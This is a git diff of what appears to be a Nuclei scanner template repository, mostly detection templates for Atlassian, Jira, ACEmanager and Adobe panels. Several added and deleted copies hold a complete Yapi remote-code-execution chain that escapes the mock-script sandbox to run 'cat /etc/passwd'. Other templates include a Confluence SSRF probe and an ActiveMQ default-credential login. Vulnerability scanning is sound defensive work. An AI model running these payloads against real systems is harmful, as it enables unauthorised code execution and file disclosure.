https://github.com/YMFE/yapi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: yapi,rce requests: - raw: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip - {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip cookie-reuse: true extractors: - type: regex @@ -77,10 +90,8 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/api/yapi-rce-11725.yaml b/poc/api/yapi-rce-11725.yaml new file mode 100644 index 0000000000..0afebedde5 --- /dev/null +++ b/poc/api/yapi-rce-11725.yaml @@ -0,0 +1,86 @@ +id: yapi-rce +info: + name: Yapi - Remote Code Execution + author: pikpikcu + severity: critical + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: yapi,rce +requests: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json, text/plain, */* + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/03 diff --git a/poc/api/yapi-rce-11726.yaml b/poc/api/yapi-rce-11726.yaml deleted file mode 100644 index 3187470f26..0000000000 --- a/poc/api/yapi-rce-11726.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: yapi-rce -info: - name: Yapi Remote Code Execution - author: pikpikcu - severity: critical - tags: yapi,rce - description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. - reference: - - https://www.secpulse.com/archives/162502.html - - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - - https://twitter.com/sec715/status/1415484190561161216 - - https://github.com/YMFE/yapi -requests: - - raw: - - | # REQUEST 1 - POST /api/user/reg HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - - {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - - | # REQUEST 2 - GET /api/group/list HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json, text/plain, */* - - | # REQUEST 3 - POST /api/project/add HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - - {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - - | # REQUEST 4 - GET /api/project/get?id={{project_id}} HTTP/1.1 - Host: {{Hostname}} - - | # REQUEST 5 - POST /api/interface/add HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - - {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - - | # REQUEST 6 - POST /api/plugin/advmock/save HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - - {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - - | # REQUEST 7 - GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - extractors: - - type: regex - name: group_id - group: 1 - internal: true - part: body - regex: - - '"_id":([0-9]+),"group_name"' - - type: regex - name: interface_id - group: 1 - internal: true - part: body - regex: - - '"req_body_form":\[\],"_id":([0-9]+)' - - type: regex - name: project_id - group: 1 - internal: true - part: body - regex: - - '"tag":\[\],"_id":([0-9]+)' - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - type: status - status: - - 200 diff --git a/poc/atlassian/atlassian-crowd-panel-584.yaml b/poc/atlassian/atlassian-crowd-panel-584.yaml index 4fd18bcda4..22e6b159b8 100644 --- a/poc/atlassian/atlassian-crowd-panel-584.yaml +++ b/poc/atlassian/atlassian-crowd-panel-584.yaml @@ -1,19 +1,38 @@ id: atlassian-crowd-panel info: - name: Atlassian Crowd panel detect - author: organiccrap + name: Atlassian Crowd Login Panel + author: organiccrap,AdamCrosser severity: info - tags: panel + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + vendor: atlassian + product: crowd + category: sso + tags: panel,atlassian -requests: +http: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: - Atlassian Crowd - Login part: body + + extractors: + - type: regex + name: version + group: 1 + regex: + - 'value="Version: ([\d.]+)' + part: body + +# digest: 490a00463044022058e3efd996636014da83a97270ff8ceeffaf677d640c65e6bee08cff09f6fd8902206ec9b89a16efc001752c4ed1dd8de24c369521320b86bfa896b101cedf978233:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/bitbucket-takeover-740.yaml b/poc/atlassian/bitbucket-takeover-739.yaml similarity index 100% rename from poc/atlassian/bitbucket-takeover-740.yaml rename to poc/atlassian/bitbucket-takeover-739.yaml diff --git a/poc/atlassian/bitbucket-takeover.yaml b/poc/atlassian/bitbucket-takeover.yaml index 9d027b93b1..e93be7cca6 100644 --- a/poc/atlassian/bitbucket-takeover.yaml +++ b/poc/atlassian/bitbucket-takeover.yaml @@ -6,15 +6,21 @@ info: severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz + metadata: + max-request: 1 tags: takeover -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Repository not found" @@ -23,4 +29,6 @@ requests: - type: word words: - "text/plain" - part: header \ No newline at end of file + part: header + +# digest: 490a0046304402205b7987c056997dd8161cbd726a93029f3a2d206d66578330bd5fba78acdbb0b302201841488659a4fbf01a69e02d721787a50df41e386528a826981c64d5c2154306:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/confluence-detect-1186.yaml b/poc/atlassian/confluence-detect-1186.yaml index 0e63d59c09..b860a53f8f 100644 --- a/poc/atlassian/confluence-detect-1186.yaml +++ b/poc/atlassian/confluence-detect-1186.yaml @@ -9,7 +9,6 @@ info: shodan-query: http.component:"Atlassian Confluence" tags: tech,confluence,atlassian - requests: - method: GET path: @@ -38,4 +37,5 @@ requests: part: body group: 1 regex: - - 'Atlassian Confluence ([a-z0-9-._]+)' + - '' + - 'Atlassian Confluence ([a-z0-9-._]+)' \ No newline at end of file diff --git a/poc/atlassian/confluence-detect-1187.yaml b/poc/atlassian/confluence-detect-1187.yaml new file mode 100644 index 0000000000..0e17bc5ab9 --- /dev/null +++ b/poc/atlassian/confluence-detect-1187.yaml @@ -0,0 +1,40 @@ +id: confluence-detect + +info: + name: Confluence Detect + author: philippedelteil + severity: info + description: Allows you to detect Atlassian Confluence instances + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: tech,confluence,atlassian + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/pages" + - "{{BaseURL}}/confluence" + - "{{BaseURL}}/wiki" + + redirects: true + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - '-confluence-' + case-insensitive: true + + - type: word + part: body + words: + - 'confluence-base-url' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Atlassian Confluence ([a-z0-9-._]+)' diff --git a/poc/atlassian/confluence-detect-1188.yaml b/poc/atlassian/confluence-detect-1188.yaml deleted file mode 100644 index b860a53f8f..0000000000 --- a/poc/atlassian/confluence-detect-1188.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: confluence-detect - -info: - name: Confluence Detect - author: philippedelteil - severity: info - description: Allows you to detect Atlassian Confluence instances - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/pages" - - "{{BaseURL}}/confluence" - - "{{BaseURL}}/wiki" - - redirects: true - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' - - extractors: - - type: regex - part: body - group: 1 - regex: - - '' - - 'Atlassian Confluence ([a-z0-9-._]+)' \ No newline at end of file diff --git a/poc/atlassian/confluence-detect-1189.yaml b/poc/atlassian/confluence-detect-1189.yaml index 0e17bc5ab9..ba239b67f4 100644 --- a/poc/atlassian/confluence-detect-1189.yaml +++ b/poc/atlassian/confluence-detect-1189.yaml @@ -5,9 +5,9 @@ info: author: philippedelteil severity: info description: Allows you to detect Atlassian Confluence instances - metadata: - shodan-query: http.component:"Atlassian Confluence" tags: tech,confluence,atlassian + metadata: + shodan-query: https://www.shodan.io/search?query=http.component%3A%22atlassian+confluence%22 requests: - method: GET @@ -19,18 +19,19 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or + matchers-condition: and matchers: - type: word - part: header words: + - '-Confluence-' - '-confluence-' - case-insensitive: true + part: header + condition: or - type: word - part: body words: - 'confluence-base-url' + part: body extractors: - type: regex diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1190.yaml similarity index 100% rename from poc/atlassian/confluence-ssrf-sharelinks-1192.yaml rename to poc/atlassian/confluence-ssrf-sharelinks-1190.yaml diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml index ce7c19d866..ed2faf3539 100644 --- a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml +++ b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml @@ -1,19 +1,44 @@ id: confluence-ssrf-sharelinks + info: - name: Confluence SSRF in sharelinks + name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery author: TechbrunchFR severity: medium - description: Vulnerable should be Confluence versions released from 2016 November and older + description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - tags: confluence,atlassian,ssrf,jira,oast + - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: confluence,atlassian,ssrf,oast + requests: - method: GET path: - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' + + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: body + words: + - "faviconURL" + - "domain" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/jira-detect-8315.yaml b/poc/atlassian/jira-detect-8315.yaml index 15c0eed570..f715749023 100644 --- a/poc/atlassian/jira-detect-8315.yaml +++ b/poc/atlassian/jira-detect-8315.yaml @@ -1,41 +1,18 @@ id: jira-detect - info: - name: Jira Detect - author: pdteam,philippedelteil,AdamCrosser + name: Detect Jira Issue Management Software + author: pdteam severity: info - description: Jira login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 - vendor: atlassian - product: jira - category: productivity - tags: tech,panel,jira,atlassian - -http: + tags: panel +requests: - method: GET path: - "{{BaseURL}}/secure/Dashboard.jspa" - "{{BaseURL}}/jira/secure/Dashboard.jspa" - "{{BaseURL}}/login.jsp" - - stop-at-first-match: true - host-redirects: true + redirects: true max-redirects: 2 matchers: - type: word words: - "Project Management Software" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'title="JiraVersion" value="([0-9.]+)' - -# digest: 490a0046304402203f99e71e0681c665e3475c12a94f49aa95b84a20350aa939aaa56fb1da3f245b022054dbaf3c59f30928faa87819f2adc87784b746dae1e058bcaf38210a1bfa597d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-service-desk-signup-8317.yaml b/poc/atlassian/jira-service-desk-signup-8317.yaml deleted file mode 100644 index 558b3ff970..0000000000 --- a/poc/atlassian/jira-service-desk-signup-8317.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: jira-service-desk-signup -info: - name: Jira Service Desk Signup - author: TechbrunchFR - severity: medium - tags: jira,atlassian -requests: - - method: POST - path: - - "{{BaseURL}}/servicedesk/customer/user/signup" - headers: - Content-Type: application/json - body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' - matchers-condition: and - matchers: - - type: word - words: - - "signup.validation.errors" - - type: status - status: - - 400 diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8326.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8326.yaml deleted file mode 100644 index c07f287060..0000000000 --- a/poc/atlassian/jira-unauthenticated-dashboards-8326.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: jira-unauthenticated-dashboards - -# If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. - -info: - name: Jira Unauthenticated Dashboards - author: TechbrunchFR - severity: info - tags: atlassian,jira - -requests: - - method: GET - path: - - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" - matchers: - - type: word - words: - - 'dashboards' - - 'startAt' - - 'maxResults' - condition: and - -# Remediation: -# Ensure that this permission is restricted to specific groups that require it. -# You can restrict it in Administration > System > Global Permissions. -# Turning the feature off will not affect existing filters and dashboards. -# If you change this setting, you will still need to update the existing filters and dashboards if they have already been -# shared publicly. -# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml index 63e0ccd5e3..54b3c68a6d 100644 --- a/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml +++ b/poc/atlassian/jira-unauthenticated-dashboards-8327.yaml @@ -1,5 +1,6 @@ id: jira-unauthenticated-dashboards # If public sharing is ON it allows users to share dashboards and filters with all users including + # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards @@ -19,9 +20,15 @@ requests: condition: and # Remediation: + # Ensure that this permission is restricted to specific groups that require it. + # You can restrict it in Administration > System > Global Permissions. + # Turning the feature off will not affect existing filters and dashboards. + # If you change this setting, you will still need to update the existing filters and dashboards if they have already been + # shared publicly. + # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced. diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml index da56b71092..58e5fb36b6 100644 --- a/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml @@ -5,15 +5,19 @@ info: author: philippedelteil severity: info description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + metadata: + max-request: 1 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,jira -requests: +http: - method: GET path: - "{{BaseURL}}/rest/config/1.0/directory" - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -23,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a0047304502210099f7859c8f6312ba07f43ba7d80b6ced1937f1ffc2ae555b1ae5d11f1cdc797d02207e68b09ecc7c8f7767224d8b8e07d539a312323747af7ba36059c9c5bdb4a5c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml new file mode 100644 index 0000000000..da56b71092 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml @@ -0,0 +1,25 @@ +id: jira-unauthenticated-installed-gadgets + +info: + name: Jira Unauthenticated Installed gadgets + author: philippedelteil + severity: info + description: Some Jira instances allow to read the installed gadgets (sometimes it's also possible to read config xml file for some gadgets) + tags: atlassian,jira + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/config/1.0/directory" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'jaxbDirectoryContents' + + - type: status + status: + - 200 diff --git a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml index 9548c4ed23..ff6dcd5d49 100644 --- a/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml +++ b/poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml @@ -1,13 +1,16 @@ id: jira-unauthenticated-projectcategories + info: name: Jira Unauthenticated Project Categories author: TESS severity: info tags: atlassian,jira + requests: - method: GET path: - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" + matchers-condition: and matchers: - type: word @@ -16,9 +19,11 @@ requests: - 'description' - 'name' condition: and + - type: status status: - 200 + - type: word part: header words: diff --git a/poc/atlassian/jira-unauthenticated-projectcategories.yaml b/poc/atlassian/jira-unauthenticated-projectcategories.yaml new file mode 100644 index 0000000000..9548c4ed23 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-projectcategories.yaml @@ -0,0 +1,25 @@ +id: jira-unauthenticated-projectcategories +info: + name: Jira Unauthenticated Project Categories + author: TESS + severity: info + tags: atlassian,jira +requests: + - method: GET + path: + - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" + matchers-condition: and + matchers: + - type: word + words: + - 'self' + - 'description' + - 'name' + condition: and + - type: status + status: + - 200 + - type: word + part: header + words: + - "atlassian.xsrf.token" diff --git a/poc/atlassian/jira-unauthenticated-projects-8335.yaml b/poc/atlassian/jira-unauthenticated-projects-8335.yaml deleted file mode 100644 index b23471572b..0000000000 --- a/poc/atlassian/jira-unauthenticated-projects-8335.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: jira-unauthenticated-projects - -info: - name: Jira Unauthenticated Projects - author: TechbrunchFR - severity: info - metadata: - max-request: 1 - shodan-query: http.component:"Atlassian Jira" - tags: atlassian,jira - -http: - - method: GET - path: - - "{{BaseURL}}/rest/api/2/project?maxResults=100" - - matchers: - - type: word - words: - - 'projects' - - 'startAt' - - 'maxResults' - condition: and - -# digest: 4a0a004730450220581d4459c98b3cfe9cc69310f86ad76f7a88cb5c8a633dba698cba5532551df002210099aed0a0def6d0deb8d063f466818d4c08fbbf1fb7576900d783852fb16c3ed5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-unauthenticated-projects.yaml b/poc/atlassian/jira-unauthenticated-projects.yaml new file mode 100644 index 0000000000..feb60dc794 --- /dev/null +++ b/poc/atlassian/jira-unauthenticated-projects.yaml @@ -0,0 +1,16 @@ +id: jira-unauthenticated-projects +info: + name: Jira Unauthenticated Projects + author: TechbrunchFR + severity: Info +requests: + - method: GET + path: + - "{{BaseURL}}/rest/api/2/project?maxResults=100" + matchers: + - type: word + words: + - 'projects' + - 'startAt' + - 'maxResults' + condition: and diff --git a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml b/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml deleted file mode 100644 index 0ce9858072..0000000000 --- a/poc/atlassian/jira-unauthenticated-user-picker-8341.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: jira-unauthenticated-user-picker -info: - name: Jira Unauthenticated User Picker - author: TechbrunchFR - severity: info - tags: atlassian,jira -requests: - - method: GET - path: - - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" - matchers: - - type: word - words: - - 'user-picker' diff --git a/poc/atlassian/jira-unauthenticated-user-picker.yaml b/poc/atlassian/jira_user_piker.yaml similarity index 100% rename from poc/atlassian/jira-unauthenticated-user-picker.yaml rename to poc/atlassian/jira_user_piker.yaml diff --git a/poc/auth/AVTECH-login-bypass.yaml b/poc/auth/AVTECH-login-bypass.yaml index a92a77b6e9..5319f73458 100644 --- a/poc/auth/AVTECH-login-bypass.yaml +++ b/poc/auth/AVTECH-login-bypass.yaml @@ -1,10 +1,12 @@ id: AVTECH-login-bypass + info: name: AVTECH 登录绕过 author: Str1am severity: critical reference: https://www.seebug.org/vuldb/ssvid-92494 tags: AVTECH,login,bypass + requests: - method: GET path: diff --git a/poc/auth/Dynatrace-token (copy 1).yaml b/poc/auth/Dynatrace-token (copy 1).yaml new file mode 100644 index 0000000000..0371d213d9 --- /dev/null +++ b/poc/auth/Dynatrace-token (copy 1).yaml @@ -0,0 +1,15 @@ +id: dynatrace-token + +info: + name: Dynatrace Token + author: gaurang + severity: high + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "dt0[a-zA-Z]{1}[0-9]{2}\\.[A-Z0-9]{24}\\.[A-Z0-9]{64}" \ No newline at end of file diff --git a/poc/auth/Dynatrace-token.yaml b/poc/auth/Dynatrace-token.yaml index 0371d213d9..3ad533dd3f 100644 --- a/poc/auth/Dynatrace-token.yaml +++ b/poc/auth/Dynatrace-token.yaml @@ -4,6 +4,7 @@ info: name: Dynatrace Token author: gaurang severity: high + tags: token,file file: - extensions: diff --git a/poc/auth/acemanager-login-24.yaml b/poc/auth/acemanager-login-24.yaml new file mode 100644 index 0000000000..bb8ee9d3fc --- /dev/null +++ b/poc/auth/acemanager-login-24.yaml @@ -0,0 +1,32 @@ +id: acemanager-login + +info: + name: ACEmanager detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' diff --git a/poc/auth/acemanager-login-25.yaml b/poc/auth/acemanager-login-25.yaml index 4e352fe09e..cb22a52d84 100644 --- a/poc/auth/acemanager-login-25.yaml +++ b/poc/auth/acemanager-login-25.yaml @@ -1,37 +1,32 @@ -id: acemanager-login - -info: - name: ACEmanager Detection - author: pussycat0x - severity: info - description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. - classification: - cwe-id: CWE-200 - metadata: - fofa-dork: app="ACEmanager" - tags: panel,login,tech,acemanager - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '::: ACEmanager :::' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'ALEOS Version ([0-9.]+) \| Copyright &co' - -# Enhanced by mp on 2022/03/14 +id: acemanager-login + +info: + name: ACEmanager detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="ACEmanager"' + tags: panel,login,tech,acemanager + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '::: ACEmanager :::' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'ALEOS Version ([0-9.]+) \| Copyright &co' diff --git a/poc/auth/activemq-default-login.yaml b/poc/auth/activemq-default-login-46.yaml similarity index 100% rename from poc/auth/activemq-default-login.yaml rename to poc/auth/activemq-default-login-46.yaml diff --git a/poc/auth/activemq-default-login-47.yaml b/poc/auth/activemq-default-login-47.yaml deleted file mode 100644 index b49e43650c..0000000000 --- a/poc/auth/activemq-default-login-47.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: activemq-default-login -info: - name: Apache ActiveMQ Default Credentials - author: pdteam - severity: medium - tags: apache,activemq,default-login -requests: - - method: GET - path: - - '{{BaseURL}}/admin/' - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" - matchers: - - type: word - words: - - 'Welcome to the Apache ActiveMQ Console of ' - - '

Broker

' - condition: and diff --git a/poc/auth/adobe-component-login-91.yaml b/poc/auth/adobe-component-login-91.yaml new file mode 100644 index 0000000000..c0042aed5b --- /dev/null +++ b/poc/auth/adobe-component-login-91.yaml @@ -0,0 +1,23 @@ +id: adobe-component-login + +info: + name: Adobe Component Browser Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6846 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/CFIDE/componentutils/login.cfm' + - '{{BaseURL}}/cfide/componentutils/login.cfm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Component Browser Login' + - type: status + status: + - 200 diff --git a/poc/auth/adobe-component-login-92.yaml b/poc/auth/adobe-component-login-92.yaml index cf0a6e2a19..cc39191db5 100644 --- a/poc/auth/adobe-component-login-92.yaml +++ b/poc/auth/adobe-component-login-92.yaml @@ -1,17 +1,15 @@ id: adobe-component-login - info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info 